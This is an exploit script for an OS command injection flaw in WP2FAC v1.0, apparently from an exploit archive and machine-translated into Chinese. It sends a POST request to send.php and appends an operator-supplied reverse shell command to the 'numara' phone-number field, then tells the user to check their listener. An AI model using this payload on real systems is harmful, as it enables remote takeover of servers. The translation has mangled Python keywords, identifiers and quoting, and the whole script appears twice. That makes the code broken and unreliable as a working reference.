#利用标题: WP2FAC V1.0 -OS命令注入
#日期: 2023-08-27
#利用作者: ahmetümitBayram
#vendor: https://github.com/metinyesil/wp2fac
#测试在: Kali Linux Windows 11
#CVE: N/A。
导入请求
def send_post_request(主机,RevShell):
url=f'http://{host}/send.php'
标题={
'用户代理:'Mozilla/5.0(X11; Linux X86_64; RV:102.0)
壁虎/20100101 Firefox/102.0',
'Accept':'/',
'Accept-Language':'En-us,en; q=0.5',
'接受编码:'gzip,deflate',
'content-type':'应用程序/x-www-form-urlenCoded; charset=utf-8',
'x-重新quested-with':'xmlhttprequest',
'Origin': F'http://{host}',
'Connection':'关闭',
'referer': f'http://{host}/',
}
数据={
'numara': f'1234567890 {revshell};'
}
响应=requests.post(url,标头=标题,data=data)
返回响应
主机=输入('目标IP:')
RevShell=输入('反向壳命令:')
打印(“检查听众!”)
send_post_request(主机,RevShell)
#日期: 2023-08-27
#利用作者: ahmetümitBayram
#vendor: https://github.com/metinyesil/wp2fac
#测试在: Kali Linux Windows 11
#CVE: N/A。
导入请求
def send_post_request(主机,RevShell):
url=f'http://{host}/send.php'
标题={
'用户代理:'Mozilla/5.0(X11; Linux X86_64; RV:102.0)
壁虎/20100101 Firefox/102.0',
'Accept':'/',
'Accept-Language':'En-us,en; q=0.5',
'接受编码:'gzip,deflate',
'content-type':'应用程序/x-www-form-urlenCoded; charset=utf-8',
'x-重新quested-with':'xmlhttprequest',
'Origin': F'http://{host}',
'Connection':'关闭',
'referer': f'http://{host}/',
}
数据={
'numara': f'1234567890 {revshell};'
}
响应=requests.post(url,标头=标题,data=data)
返回响应
主机=输入('目标IP:')
RevShell=输入('反向壳命令:')
打印(“检查听众!”)
send_post_request(主机,RevShell)